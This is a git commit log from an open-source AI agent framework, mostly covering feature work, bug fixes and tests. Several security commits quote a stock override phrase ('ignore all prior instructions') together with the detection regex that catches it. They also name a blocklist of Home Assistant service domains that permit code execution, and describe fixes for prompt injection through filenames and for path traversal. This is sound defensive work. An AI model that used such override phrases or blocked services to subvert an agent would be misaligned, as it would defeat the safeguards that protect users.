698b35933e fix: /retry, /undo, /compress, and /reset gateway commands (#210)
- /retry, /undo, /compress were setting a non-existent conversation_history
  attribute on SessionEntry (a @dataclass with no such field). The dangling
  attribute was silently created but never read — transcript was reloaded
  from DB on next interaction, making all three commands no-ops.

- /reset accessed self.session_store._sessions (non-existent) instead of
  self.session_store._entries, causing AttributeError caught by a bare
  except, silently skipping the pre-reset memory flush.

Fix:
- Add SessionDB.clear_messages() to delete messages and reset counters
- Add SessionStore.rewrite_transcript() to atomically replace transcript
  in both SQLite and legacy JSONL storage
- Replace all dangling attr assignments with rewrite_transcript() calls
- Fix _sessions → _entries in /reset handler

Closes #210
2026-03-02 00:14:49 -08:00
teknium1
0512ada793 feat(agent): include tools in agent status output
Added the tools attribute to the AIAgent class's status output, ensuring that the current tools used by the agent are included in the status information. This enhancement improves the visibility of the agent's capabilities during runtime.
2026-03-02 00:13:41 -08:00
teknium1
47289ba6f1 feat(agent): include system prompt in agent status output
Added the system prompt to the AIAgent class's status output, ensuring that the current system prompt is included in the agent's status information. This enhancement improves visibility into the agent's configuration during runtime.
2026-03-01 23:50:54 -08:00
Robin Fernandes
5e5e0efc60 Fix nous refresh token rotation failure in case where api key mint/retrieval fails 2026-03-02 17:18:15 +11:00
teknium1
7b38afc179 fix(auth): handle session expiration and re-authentication in Nous Portal
Enhanced error handling in the _model_flow_nous function to detect session expiration and prompt for re-authentication with the Nous Portal. Added logic to manage re-login attempts and provide user feedback on success or failure, improving the overall user experience during authentication issues.
2026-03-01 20:20:30 -08:00
teknium1
e5893075f9 feat(agent): add summary handling for reasoning items
Enhanced the AIAgent class to capture and normalize summary information for reasoning items. Implemented logic to handle summaries as lists, ensuring proper formatting for API interactions. Updated tests to validate the inclusion of summaries in reasoning items, both for existing and default cases.
2026-03-01 20:03:03 -08:00
teknium1
5e598a588f refactor(auth): transition Codex OAuth tokens to Hermes auth store
Updated the authentication mechanism to store Codex OAuth tokens in the Hermes auth store located at ~/.hermes/auth.json instead of the previous ~/.codex/auth.json. This change includes refactoring related functions for reading and saving tokens, ensuring better management of authentication states and preventing conflicts between different applications. Adjusted tests to reflect the new storage structure and improved error handling for missing or malformed tokens.
2026-03-01 19:59:24 -08:00
Aayush Chaudhary
c2d8d17285 feat(skills): add DuckDuckGo search skill as Firecrawl fallback 2026-03-02 09:08:59 +05:30
teknium1
8bc2de4ab6 feat(provider-routing): add OpenRouter provider routing configuration
Introduced a new `provider_routing` section in the CLI configuration to control how requests are routed across providers when using OpenRouter. This includes options for sorting providers by throughput, latency, or price, as well as allowing or ignoring specific providers, setting the order of provider attempts, and managing data collection policies. Updated relevant classes and documentation to support these features, enhancing flexibility in provider selection.
2026-03-01 18:24:27 -08:00
teknium1
75a92a3f82 refactor(cli): improve header formatting and description truncation
Updated the CLI header formatting for tool and configuration displays to center titles within their respective widths. Enhanced the display of command descriptions to include an ellipsis for longer texts, ensuring better readability. This refactor improves the overall user interface of the CLI.
2026-03-01 16:37:16 -08:00
teknium1
72963e9ccb fix(install): prevent interactive prompts during non-interactive installs
Updated the install.sh script to set DEBIAN_FRONTEND and NEEDRESTART_MODE environment variables for non-interactive package installations on Ubuntu and Debian. This change ensures that prompts from needrestart and whiptail do not block the installation process, improving automation for system package installations.
2026-03-01 16:18:35 -08:00
teknium1
92da8e7e62 feat(agent): enhance reasoning handling and configuration
Added support for processing encrypted reasoning content within the AIAgent class. Introduced logic to determine reasoning effort and enable/disable reasoning based on configuration settings. Updated the kwargs to reflect these changes, ensuring proper handling of reasoning parameters during agent execution.
2026-03-01 16:15:20 -08:00
teknium1
c84d5ce738 refactor(terminal_tool): clarify foreground and background process usage
Updated documentation within terminal_tool.py to emphasize the appropriate use of foreground and background processes. Enhanced descriptions for the timeout setting and background execution to guide users towards optimal configurations for scripts, builds, and long-running tasks. Adjusted the default timeout value from 60 to 180 seconds for improved handling of longer operations.
2026-03-01 16:15:05 -08:00
teknium1
dda9f3e734 fix(process_registry): ensure unbuffered output for subprocesses
Updated the environment variables for subprocess execution in the ProcessRegistry class to set PYTHONUNBUFFERED to "1". This change ensures that output from Python scripts is unbuffered, allowing for real-time visibility of progress during background execution. Adjusted both the pty and background process spawning methods to use the new environment configuration.
2026-03-01 16:14:57 -08:00
teknium1
834e25a662 feat(batch_runner): enhance prompt processing with optional container image support
Updated the _process_single_prompt function to accept an optional 'image' field in prompt_data, allowing for per-prompt container image overrides. Implemented checks for Docker image accessibility and added logic to register task environment overrides for Docker, Modal, and Singularity. This improves flexibility in managing containerized environments for prompt execution.
2026-03-01 16:14:36 -08:00
aydnOktay
196a13f3dc Improve error handling and validation in transcription_tools 2026-03-02 01:53:18 +03:00
aydnOktay
440d33eec4 Improve error handling and type hints in session_search_tool 2026-03-02 01:50:37 +03:00
teknium1
11f5c1ecf0 fix(tests): use bare @pytest.mark.asyncio for hook emit tests
Remove loop_scope="function" parameter from async test decorators in
test_hooks.py. This matches the existing convention in the repo
(test_telegram_documents.py) and avoids requiring pytest-asyncio 0.23+.

All 144 new tests from PR #191 now pass.
2026-03-01 05:28:55 -08:00
0xbyt4
3b745633e4 test: add unit tests for 8 untested modules (batch 3) (#191)
* test: add unit tests for 8 untested modules (batch 3)

New test files (143 tests total):
- tools/debug_helpers.py: DebugSession enable/disable, log, save, session info
- tools/skills_guard.py: scan_file, scan_skill, trust levels, install policy, structural checks
- tools/skills_sync.py: manifest read/write, skill discovery, sync logic
- gateway/sticker_cache.py: cache CRUD, sticker injection text builders
- gateway/channel_directory.py: channel resolution, display formatting, session building
- gateway/hooks.py: hook discovery, sync/async emit, wildcard matching
- gateway/mirror.py: session lookup, JSONL append, mirror_to_session
- honcho_integration/client.py: config from env/file, session name resolution, linked workspaces

Also documents a gap in skills_guard: multi-word prompt injection
variants like "ignore all prior instructions" bypass the regex scanner.

* test: strengthen sticker injection tests with exact format assertions

Replace loose "contains" checks with exact output matching for
build_sticker_injection and build_animated_sticker_injection.
Add edge cases: set_name without emoji, empty description, empty emoji.

* test: remove skills_guard gap-documenting test to avoid conflict with fix PR
2026-03-01 05:28:12 -08:00
0xbyt4
900d48714a Merge remote-tracking branch 'origin/main' into test/expand-coverage-4
# Conflicts:
#	tests/agent/test_auxiliary_client.py
2026-03-01 12:11:54 +03:00
0xbyt4
3fdf03390e Merge remote-tracking branch 'origin/main' into feature/homeassistant-integration
# Conflicts:
#	run_agent.py
2026-03-01 11:59:12 +03:00
0xbyt4
25fb9aafcb fix: add service domain blocklist and entity_id validation to HA tools
Block dangerous HA service domains (shell_command, command_line,
python_script, pyscript, hassio, rest_command) that allow arbitrary
code execution or SSRF. Add regex validation for entity_id to prevent
path traversal attacks. 17 new tests covering both security features.
2026-03-01 11:53:50 +03:00
Bartok Moltbot
54147474d3 feat(gateway): include Discord channel topic in session context
Fixes #163

- Add chat_topic field to SessionSource dataclass
- Update to_dict/from_dict for serialization support
- Add chat_topic parameter to build_source helper
- Extract channel.topic in Discord adapter for messages and slash commands
- Display Channel Topic in system prompt when available
- Normalize empty topics to None
2026-03-01 03:48:24 -05:00
teknium1
4d6f380bd1 docs: update README and CLI documentation for new commands
Enhanced the README and CLI documentation to include the newly added `/compress` and `/usage` commands for managing conversation context and monitoring token usage. Updated log descriptions to clarify the contents of log files and ensured that sensitive information is automatically redacted. This improves user understanding of available features and log management.
2026-03-01 00:28:07 -08:00
teknium1
93f5fd80b8 feat(gateway): add /compress and /usage commands for conversation management
Implemented the /compress command to allow users to manually compress conversation context, ensuring sufficient history is available before execution. The /usage command was also added to display token usage statistics for the current session, including prompt and completion tokens. Updated command documentation to reflect these new features.
2026-03-01 00:25:44 -08:00
teknium1
177be32b7f feat(cli): add /usage command to display session token usage
Introduced a new command "/usage" in the CLI to show cumulative token usage for the current session. This includes details on prompt tokens, completion tokens, total tokens, API calls, and context state. Updated command documentation to reflect this addition. Enhanced the AIAgent class to track token usage throughout the session.
2026-03-01 00:23:19 -08:00
teknium1
30efc263ff feat(cli): add /compress command for manual conversation context compression
Introduced a new command "/compress" to the CLI, allowing users to manually trigger context compression on the current conversation. The method checks for sufficient conversation history and active agent status before performing compression, providing feedback on the number of messages and tokens before and after the operation. Updated command documentation accordingly.
2026-03-01 00:16:38 -08:00
Bartok Moltbot
ed0e860abb fix(honcho): auto-enable when API key is present
Fixes #241

When users set HONCHO_API_KEY via `hermes config set` or environment
variable, they expect the integration to activate. Previously, the
`enabled` flag defaulted to `false` when reading from global config,
requiring users to also explicitly enable Honcho.

This change auto-enables Honcho when:
- An API key is present (from config file or env var)
- AND `enabled` is not explicitly set to `false` in the config

Users who want to disable Honcho while keeping the API key can still
set `enabled: false` in their config.

Also adds unit tests for the auto-enable behavior.
2026-03-01 03:12:37 -05:00
teknium1
41d8a80226 fix(display): fix subagent progress tree-view visual nits
Two fixes to the subagent progress display from PR #186:

1. Task index prefix: show 1-indexed prefix ([1], [2], ...) for ALL
   tasks in batch mode (task_count > 1). Single tasks get no prefix.
   Previously task 0 had no prefix while others did, making batch
   output confusing.

2. Completion indicator: use spinner.print_above() instead of raw
   print() for per-task completion lines (✓ [1/2] ...). Raw print
   collided with the active spinner, mushing the completion text
   onto the spinner line. Now prints cleanly above.

Added task_count parameter to _build_child_progress_callback and
_run_single_child. Updated tests accordingly.
2026-02-28 23:29:49 -08:00
teknium1
4ec386cc72 fix(display): use spaces instead of ANSI \033[K in print_above() for prompt_toolkit compat
print_above() used \033[K (erase-to-end-of-line) to clear the spinner
line before printing text above it. This causes garbled escape codes when
prompt_toolkit's patch_stdout is active in CLI mode.

Switched to the same spaces-based clearing approach used by stop() —
overwrite with blanks, then carriage return back to start of line.

Updated test assertion to match the new clearing method.
2026-02-28 23:19:23 -08:00
lila
dd69f16c3e feat(gateway): expose subagent tool calls and thinking to user (fixes #169) (#186)
When subagents run via delegate_task, the user now sees real-time
progress instead of silence:

CLI: tree-view activity lines print above the delegation spinner
  🔀 Delegating: research quantum computing
     ├─ 💭 "I'll search for papers first..."
     ├─ 🔍 web_search  "quantum computing"
     ├─ 📖 read_file  "paper.pdf"
     └─ ⠹ working... (18.2s)

Gateway (Telegram/Discord): batched progress summaries sent every
5 tool calls to avoid message spam. Remaining tools flushed on
subagent completion.

Changes:
- agent/display.py: add KawaiiSpinner.print_above() to print
  status lines above an active spinner without disrupting animation.
  Uses captured stdout (self._out) so it works inside the child's
  redirect_stdout(devnull).

- tools/delegate_tool.py: add _build_child_progress_callback()
  that creates a per-child callback relaying tool calls and
  thinking events to the parent's spinner (CLI) or progress
  queue (gateway). Each child gets its own callback instance,
  so parallel subagents don't share state. Includes _flush()
  for gateway batch completion.

- run_agent.py: fire tool_progress_callback with '_thinking'
  event when the model produces text content. Guarded by
  _delegate_depth > 0 so only subagents fire this (prevents
  gateway spam from main agent). REASONING_SCRATCHPAD/think/
  reasoning XML tags are stripped before display.

Tests: 21 new tests covering print_above, callback builder,
thinking relay, SCRATCHPAD filtering, batching, flush, thread
isolation, delegate_depth guard, and prefix handling.
2026-02-28 23:18:00 -08:00
teknium1
1db5598294 feat(tests): add live integration tests for file operations and shell noise filtering
- Introduce a new test suite in `test_file_tools_live.py` to validate file operations and ensure accurate command execution in a real environment.
- Implement assertions to check for shell noise contamination in outputs, enhancing the reliability of command results.
- Create fixtures for setting up a local environment and populating directories with known file contents for comprehensive testing.
- Refactor shell noise handling in `process_registry.py` and `local.py` to support multiple noise patterns, improving output cleanliness.
2026-02-28 22:57:58 -08:00
teknium1
23d0b7af6a feat(logging): implement persistent error logging for tool failures
- Introduce a separate error log for capturing warnings and errors related to tool execution, ensuring detailed inspection of issues post-failure.
- Enhance error handling in the AIAgent class to log exceptions with stack traces for better debugging.
- Add a similar error logging mechanism in the gateway to streamline debugging processes.
2026-02-28 22:49:58 -08:00
teknium1
a7c2b9e280 fix(display): enhance memory error detection for tool failures
- Implement logic to distinguish between "full" memory errors and actual failures in the `_detect_tool_failure` function.
- Add JSON parsing to identify specific error messages related to memory limits, improving error handling for memory-related tools.
2026-02-28 22:49:52 -08:00
teknium1
70dfec9638 test(redact): add sensitive text redaction
- Introduce a new test suite for the `redact_sensitive_text` function, covering various sensitive data formats including API keys, tokens, and environment variables.
- Ensure that sensitive information is properly masked in logs and outputs while non-sensitive data remains unchanged.
- Add tests for different scenarios including JSON fields, authorization headers, and environment variable assignments.
- Implement a redacting formatter for logging to enhance security during log output.
2026-02-28 21:56:27 -08:00
teknium1
95b0610f36 refactor(cli, auth): Add Codex/OpenAI OAuth Support - finalized
- Replace `hermes login` with `hermes model` for selecting providers and managing authentication.
- Update documentation and CLI commands to reflect the new provider selection process.
- Introduce a new redaction system for logging sensitive information.
- Enhance Codex model discovery by integrating API fetching and local cache.
- Adjust max turns configuration logic for better clarity and precedence.
- Improve error handling and user feedback during authentication processes.
2026-02-28 21:56:27 -08:00
teknium1
500f0eab4a refactor(cli): Finalize OpenAI Codex Integration with OAuth
- Enhanced Codex model discovery by fetching available models from the API, with fallback to local cache and defaults.
- Updated the context compressor's summary target tokens to 2500 for improved performance.
- Added external credential detection for Codex CLI to streamline authentication.
- Refactored various components to ensure consistent handling of authentication and model selection across the application.
2026-02-28 21:47:51 -08:00
Teknium
86b1db0598 Merge pull request #43 from grp06/codex/align-codex-provider-conventions-mainrepo
Enable ChatGPT subscription Codex support end-to-end
2026-02-28 18:13:58 -08:00
Teknium
5a79e423fe Merge branch 'main' into codex/align-codex-provider-conventions-mainrepo 2026-02-28 18:13:38 -08:00
teknium1
7f7643cf63 feat(hooks): introduce event hooks system for lifecycle management
Add a new hooks system allowing users to run custom code at key lifecycle points in the agent's operation. This includes support for events such as `gateway:startup`, `session:start`, `agent:step`, and more. Documentation for creating hooks and available events has been added to `README.md` and a new `hooks.md` file. Additionally, integrate step callbacks in the agent to facilitate hook execution during tool-calling iterations.
2026-02-28 17:09:26 -08:00
teknium1
bf52468a91 fix(gateway): improve MEDIA tag handling to prevent duplication across turns
Refactor the extraction of MEDIA paths to collect them from the history before processing the current turn's messages. This change ensures that MEDIA tags are deduplicated based on previously seen paths, preventing TTS voice messages from being re-attached in subsequent replies. This addresses the issue outlined in #160.
2026-02-28 16:49:49 -08:00
Teknium
b4688f10d4 Merge pull request #176 from Bartok9/fix-tts-voice-accumulation
fix(gateway): prevent TTS voice messages from accumulating across turns
2026-02-28 16:45:52 -08:00
Teknium
31a5cd185a Merge pull request #174 from Bartok9/fix-think-block-leakage
fix: strip <think> blocks from final response to users
2026-02-28 16:43:47 -08:00
Farukest
7166647ca1 fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection 2026-03-01 03:23:29 +03:00
Farukest
f7300a858e fix(tools): use task-specific glob pattern in disk usage calculation 2026-03-01 03:17:50 +03:00
Farukest
e87859e82c fix(agent): copy conversation_history to avoid mutating caller's list 2026-03-01 03:06:13 +03:00
Farukest
de101a8202 fix(agent): strip _flush_sentinel from API messages 2026-03-01 02:51:31 +03:00
Farukest
7f1f4c2248 fix(tools): preserve empty content in ReadResult.to_dict() 2026-03-01 02:42:15 +03:00
Farukest
c33f8d381b fix: correct off-by-one in retry exhaustion checks
The retry exhaustion checks used > instead of >= to compare
retry_count against max_retries. Since the while loop condition is
retry_count < max_retries, the check retry_count > max_retries can
never be true inside the loop. When retries are exhausted, the loop
exits and falls through to response.choices[0] on an invalid response,
crashing with IndexError instead of returning a proper error.
2026-03-01 02:27:26 +03:00
Farukest
3f58e47c63 fix: guard POSIX-only process functions for Windows compatibility
os.setsid, os.killpg, and os.getpgid do not exist on Windows and raise
AttributeError on import or first call. This breaks the terminal tool,
code execution sandbox, process registry, and WhatsApp bridge on Windows.

Added _IS_WINDOWS platform guard in all four affected files, following
the pattern documented in CONTRIBUTING.md. On Windows, preexec_fn is
set to None and process termination falls back to proc.terminate() /
proc.kill() instead of process group signals.

Files changed:
- tools/environments/local.py (3 call sites)
- tools/process_registry.py (2 call sites)
- tools/code_execution_tool.py (3 call sites)
- gateway/platforms/whatsapp.py (3 call sites)
2026-03-01 01:54:27 +03:00
Farukest
b7f8a17c24 fix(gateway): persist transcript changes in /retry, /undo and fix /reset
/retry and /undo set session_entry.conversation_history which does not
exist on SessionEntry. The truncated history was never written to disk,
so the next message reload picked up the full unmodified transcript.

Added SessionStore.rewrite_transcript() that persists changes to both
the JSONL file and SQLite database, and updated both commands to use it.

/reset accessed self.session_store._sessions which does not exist on
SessionStore (the correct attribute is _entries). Also replaced the
hand-coded session key with _generate_session_key() to fix WhatsApp DM
sessions using the wrong key format.

Closes #210
2026-03-01 01:40:30 +03:00
VolodymyrBg
6cbb8f3a0c fix: align _apply_delete comment with actual behavior 2026-02-28 22:58:01 +02:00
gizdusum
ec97f9ad1a feat(skills): add Solana blockchain skill (converted from tool) 2026-02-28 23:39:39 +03:00
0xbyt4
10085041cf feat: add ascii-art skill for creative text banners and art
Unicode-based ASCII art generator skill with multiple styles
(block, shadow, outlined, gradient, decorative frame), character
palette reference, and usage examples. No external dependencies.
2026-02-28 22:33:10 +03:00
teknium1
7b23dbfe68 feat(animation): add support for sending animated GIFs in BasePlatformAdapter and TelegramAdapter 2026-02-28 11:25:44 -08:00
teknium1
8e0c48e6d2 feat(skills): implement dynamic skill slash commands for CLI and gateway 2026-02-28 11:18:50 -08:00
0xbyt4
b759602483 fix: prevent italic regex from spanning newlines in Telegram formatter
The italic regex \*([^*]+)\* used [^*] which matches newlines, causing
bullet lists with * markers to be incorrectly converted to italic text.
Changed to [^*\n]+ to prevent cross-line matching.

Adds 43 tests for _escape_mdv2 and format_message covering code blocks,
bold/italic, headers, links, mixed formatting, and the regression case.
2026-02-28 22:01:48 +03:00
teknium1
2205b22409 fix(headers): update X-OpenRouter-Categories to include 'productivity' 2026-02-28 10:38:49 -08:00
teknium1
1ddf8c26f5 refactor(cli): update max turns configuration precedence and enhance documentation 2026-02-28 10:35:49 -08:00
0xbyt4
9769e07cd5 test: add 25 unit tests for trajectory_compressor
Tests cover CompressionConfig (defaults, from_yaml with full/partial/empty),
TrajectoryMetrics and AggregateMetrics (to_dict, aggregation, division-by-zero
guards), _find_protected_indices (basic, all-protected, no tail, missing roles,
disabled protection), _extract_turn_content_for_summary (basic, truncation,
empty range), and token counting (empty, basic, trajectory, fallback on error).
2026-02-28 21:28:28 +03:00
0xbyt4
08250a53a1 fix: skills hub dedup prefers higher trust levels + 43 tests
- unified_search and GitHubSource.search dedup: replace naive
  `trust_level == "trusted"` check with ranked comparison so
  "builtin" results are never overwritten by "trusted" or "community"
- Add 43 unit tests covering _parse_frontmatter_quick, trust_level_for,
  HubLockFile CRUD, TapsManager ops, LobeHub _convert_to_skill_md,
  unified_search dedup (with regression test), and append_audit_log
2026-02-28 21:25:55 +03:00
0xbyt4
ff6d62802d fix: platform base extract_images and truncate_message bugs + tests
- extract_images: only remove extracted image tags from content, preserve
  non-image markdown links (e.g. PDFs) that were previously silently lost
- truncate_message: walk only chunk_body (not prepended prefix) so the
  reopened code fence does not toggle in_code off, leaving continuation
  chunks with unclosed code blocks
- Add 49 unit tests covering MessageEvent command parsing, extract_images,
  extract_media, truncate_message code block handling, and _get_human_delay
2026-02-28 21:21:03 +03:00
0xbyt4
46506769f1 test: add unit tests for 5 security/logic-critical modules (batch 4)
- gateway/pairing.py: rate limiting, lockout, code expiry, approval flow (28 tests)
- tools/skill_manager_tool.py: validation, path traversal prevention, CRUD (46 tests)
- tools/skills_tool.py: frontmatter/tag parsing, skill discovery, view chain (34 tests)
- agent/auxiliary_client.py: auth reading, API key resolution, param branching (16 tests)
- honcho_integration/session.py: session dataclass, ID sanitization, transcript format (20 tests)
2026-02-28 20:33:48 +03:00
0xbyt4
4ea29978fc fix(security): catch multi-word prompt injection in skills_guard
The regex `ignore\s+(previous|all|...)\s+instructions` only matched
a single keyword between 'ignore' and 'instructions'. Phrases like
'ignore all prior instructions' bypassed the scanner entirely.

Changed to `ignore\s+(?:\w+\s+)*(previous|all|...)\s+instructions`
to allow arbitrary words before the keyword.
2026-02-28 20:16:48 +03:00
0xbyt4
dfd50ceccd fix: preserve Gemini thought_signature in tool call messages
Gemini 3 thinking models attach extra_content with thought_signature
to function call responses. This must be echoed back on subsequent
API calls or the server rejects with a 400 error. The assistant
message builder was dropping this field, causing all Gemini 3 Flash/Pro
tool-calling flows to fail after the first function call.
2026-02-28 18:10:05 +03:00
teknium1
6366177118 refactor: update context compression configuration to use config.yaml and improve model handling 2026-02-28 04:46:38 -08:00
0xbyt4
2390728cc3 fix: resolve 4 bugs found in HA integration code review
- Auto-authorize HA events in gateway (system-generated, not user messages)
- Guard _read_events against None/closed WebSocket after failed reconnect
- Use UUID for send() message_id instead of polluting WS sequence counter
- entity_id parameter now takes precedence over data["entity_id"]
2026-02-28 15:12:18 +03:00
0xbyt4
b32c642af3 test: add HA integration tests with fake in-process server
Fake HA server (aiohttp.web) simulates full API surface over real TCP:
- WebSocket auth handshake + event push
- REST endpoints (states, services, notifications)

14 integration tests verify end-to-end flows without mocks:
- WS connect/auth/subscribe/event-forwarding/disconnect
- REST list/get/call-service against fake server
- send() notification delivery and auth failure
- 401/500 error handling
2026-02-28 14:28:04 +03:00
0xbyt4
c36b256de5 feat: add Home Assistant integration (REST tools + WebSocket gateway)
- Add ha_list_entities, ha_get_state, ha_call_service tools via REST API
- Add WebSocket gateway adapter for real-time state_changed event monitoring
- Support domain/entity filtering, cooldown, and auto-reconnect with backoff
- Use REST API for outbound notifications to avoid WS race condition
- Gate tool availability on HASS_TOKEN env var
- Add 82 unit tests covering real logic (filtering, payload building, event pipeline)
2026-02-28 13:32:48 +03:00
Teknium
0afe1b707d Merge pull request #178 from gamedevCloudy/main
fix(install): ignore commented lines when checking for PATH
2026-02-28 02:14:31 -08:00
Aayush Chaudhary
f213620c8b fix(install): ignore commented lines when checking for existing PATH configuration 2026-02-28 14:28:18 +05:30
Bartok9
35655298e6 fix(gateway): prevent TTS voice messages from accumulating across turns
Fixes #160

The issue was that MEDIA tags were being extracted from ALL messages
in the conversation history, not just messages from the current turn.
This caused TTS voice messages generated in earlier turns to be
re-attached to every subsequent reply.

The fix:
- Track history_len before calling run_conversation
- Only scan messages AFTER history_len for MEDIA tags
- Add comprehensive tests to prevent regression

This ensures each voice message is sent exactly once, when it's
generated, not on every subsequent message in the session.
2026-02-28 03:38:27 -05:00
Bartok9
1e463a8e39 fix: strip <think> blocks from final response to users
Fixes #149

The _strip_think_blocks() method existed but was not applied to the
final_response in the normal completion path. This caused <think>...</think>
XML tags to leak into user-facing responses on all platforms (CLI, Telegram,
Discord, Slack, WhatsApp).

Changes:
- Strip think blocks from final_response before returning in normal path (line ~2600)
- Strip think blocks from fallback content when salvaging from prior tool_calls turn

Notes:
- The raw content with think blocks is preserved in messages[] for trajectory
  export - this only affects the user-facing final_response
- The _has_content_after_think_block() check still uses raw content before
  stripping, which is correct for detecting think-only responses
2026-02-28 03:06:20 -05:00
teknium1
de5a88bd97 refactor: migrate tool progress configuration from environment variables to config.yaml 2026-02-28 00:05:58 -08:00
teknium1
0862fa96fd refactor(domain-intel): streamline documentation and add CLI tool for domain intelligence operations 2026-02-27 23:53:24 -08:00
Teknium
924570c5be Merge pull request #136 from FurkanL0/feat/domain-intel-skill
feat(skills): add passive domain intelligence skill — subdomains, SSL, WHOIS, DNS, availability
2026-02-27 23:47:50 -08:00
teknium1
4d8689c10c feat: add honcho-ai package to dependencies and update extras in uv.lock 2026-02-27 23:45:52 -08:00
teknium1
1d7ce5e063 feat: integrate honcho-ai package and enhance tool progress callback in delegate_tool 2026-02-27 23:45:52 -08:00
Teknium
72d3425eef Merge pull request #94 from cesareth/feat/verbose-slash-command
feat(cli): add /verbose slash command to toggle debug output at runtime
2026-02-27 23:41:25 -08:00
teknium1
b7f099beed feat: add Honcho integration for cross-session user modeling 2026-02-27 23:41:08 -08:00
Teknium
912ef50165 Merge pull request #38 from plastic-labs/feat/honcho-integration
feat: Honcho memory integration (opt-in)
2026-02-27 23:35:29 -08:00
Teknium
4a9086b848 Merge branch 'main' into feat/honcho-integration 2026-02-27 23:32:49 -08:00
teknium1
50cb4d5fc7 fix(agent): update error message for unsupported Anthropic API endpoints to clarify usage of OpenRouter 2026-02-27 23:23:31 -08:00
Teknium
2bc9508b7c Merge pull request #173 from adavyas/fix/anthropic-base-url-guard
fix(agent): fail fast on Anthropic native base URLs
2026-02-27 23:22:01 -08:00
Teknium
337cd574c8 Merge pull request #167 from Jr-kenny/pr/docs-codefences
fix(docs): add missing code block language specifiers
2026-02-27 23:16:27 -08:00
Teknium
9fb027915e Merge pull request #166 from Jr-kenny/pr/docs-config
fix(docs): correct CLI config precedence and paths
2026-02-27 23:15:36 -08:00
Teknium
2b821c3a14 Merge pull request #162 from aydnOktay/fix/memory-tool-entry-delimiter-parsing
Fix memory tool entry parsing when content contains section sign
2026-02-27 23:13:15 -08:00
Teknium
0d113fab1a Merge pull request #158 from Indelwin/feature/docker-volumes
feat: add docker_volumes config for custom volume mounts
2026-02-27 23:06:06 -08:00
teknium1
19f28a633a fix(agent): enhance 413 error handling and improve conversation history management in tests 2026-02-27 23:04:32 -08:00
Teknium
2c817ce4a5 Merge pull request #153 from tekelala/main
fix(agent): handle 413 payload-too-large via compression instead of aborting
2026-02-27 22:57:55 -08:00
teknium1
66a5bc64db fix(process): use shlex to safely quote commands in bg_command for improved security 2026-02-27 22:50:26 -08:00
Teknium
7f423508e4 Merge pull request #151 from johnh4098/fix/shell-injection-spawn-via-env-v2
fix(process): escape single quotes in spawn_via_env bg_command
2026-02-27 22:49:04 -08:00
Teknium
306c6706a6 Merge pull request #150 from VencentSoliman/fix/gateway-model-personality-commands
fix(gateway): sync /model and /personality with CLI pattern
2026-02-27 22:48:03 -08:00
Teknium
64be67e062 Merge pull request #146 from alireza78a/fix/atomic-cron-job-save
fix(cron): use atomic write in save_jobs to prevent data loss
2026-02-27 22:16:43 -08:00
adavyas
0c0a2eb0a2 fix(agent): fail fast on Anthropic native base URLs 2026-02-27 21:19:29 -08:00
teknium1
de0829cec3 fix(cli): increase max iterations for child agents and extend API call timeout for improved reliability 2026-02-27 17:35:29 -08:00
Teknium
20177660bb Merge pull request #142 from Bartok9/docs/add-slash-commands-reference
docs: add slash commands reference
2026-02-27 17:33:19 -08:00
Jr-kenny
609fc6d080 fix(docs): add missing code block language specifiers 2026-02-28 02:04:38 +01:00
Jr-kenny
518826e70c fix(docs): standardize terminology and CLI formatting 2026-02-28 02:03:39 +01:00
Jr-kenny
13992a58da fix(docs): correct CLI config precedence and paths 2026-02-28 02:00:32 +01:00
Teknium
0d2ac1c07f Merge pull request #121 from Bartok9/test-clarify-tool
test(tools): add unit tests for clarify_tool.py
2026-02-27 16:27:37 -08:00
teknium1
fb7df099e0 feat(cli): add shell noise filtering and improve command execution with interactive login shell 2026-02-27 16:26:47 -08:00
teknium1
f14ff3e041 feat(cli): use user's login shell for command execution to ensure environment consistency 2026-02-27 15:10:27 -08:00
VencentSoliman
07fcb94bc0 fix(gateway): sync /model and /personality with CLI config.yaml pattern 2026-02-27 17:39:25 -05:00
aydnOktay
66d9983d46 Fix memory tool entry parsing when content contains section sign
- Use ENTRY_DELIMITER (\\n§\\n) instead of '§' when splitting entries in _read_file
- Prevents incorrect parsing when memory entries contain '§' character
- Aligns read logic with write logic for consistency
2026-02-28 01:33:41 +03:00
teknium1
4f3cb98e5e feat(cli): implement platform-specific toolset selection with improved user interface 2026-02-27 14:26:23 -08:00
teknium1
8c1f5efcab feat(cli): add toolset API key validation and improve checklist display 2026-02-27 13:56:43 -08:00
teknium1
c92bdd8785 fix(cli): improve spinner line clearing to prevent garbled output with prompt_toolkit 2026-02-27 13:49:06 -08:00
teknium1
e09ef6b8bc feat(gateway): improve model command handling by resolving current model from environment and config file 2026-02-27 13:42:07 -08:00
Gesina Sands
f7677ed275 feat: add docker_volumes config for custom volume mounts 2026-02-28 07:12:48 +10:00
johnh4098
e5f719a33b fix(process): escape single quotes in spawn_via_env bg_command 2026-02-27 21:03:17 +03:30
tekelala
79bd65034c fix(agent): handle 413 payload-too-large via compression instead of aborting
The 413 "Request Entity Too Large" error from the LLM API was caught by the
generic 4xx handler which aborts immediately. This is wrong for 413 — it's a
payload-size issue that can be resolved by compressing conversation history.

- Intercept 413 before the generic 4xx block and route to _compress_context
- Exclude 413 from generic is_client_error detection
- Add 'request entity too large' to context-length phrases as safety net
- Add tests for 413 compression behavior

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 12:21:27 -05:00
tekelala
fbb1923fad fix(security): patch path traversal, size bypass, and prompt injection in document processing
- Sanitize filenames in cache_document_from_bytes to prevent path traversal (strip directory components, null bytes, resolve check)
- Reject documents with None file_size instead of silently allowing download
- Cap text file injection at 100 KB to prevent oversized prompt payloads
- Sanitize display_name in run.py context notes to block prompt injection via filenames
- Add 35 unit tests covering document cache utilities and Telegram document handling

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 11:53:46 -05:00
alireza78a
bf75c450b7 fix(cron): use atomic write in save_jobs to prevent data loss 2026-02-27 20:16:49 +03:30
tekelala
b2172c4b2e feat(telegram): add document file processing for PDF, text, and Office files
Download, cache, and enrich document files sent via Telegram. Supports
.pdf, .md, .txt, .docx, .xlsx, .pptx with size validation, unsupported
type rejection, text content injection for .md/.txt, and hourly cache
cleanup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 11:44:57 -05:00
Bartok Moltbot
69ccd76679 docs: add slash commands reference
Adds a comprehensive reference for all CLI slash commands including:
- Navigation & control commands
- Tools & configuration commands
- Conversation management
- Advanced features (cron, skills, platforms)
- Usage examples
- Tips for users

Makes it easier for new users to discover available commands.
2026-02-27 10:50:53 -05:00
teknium1
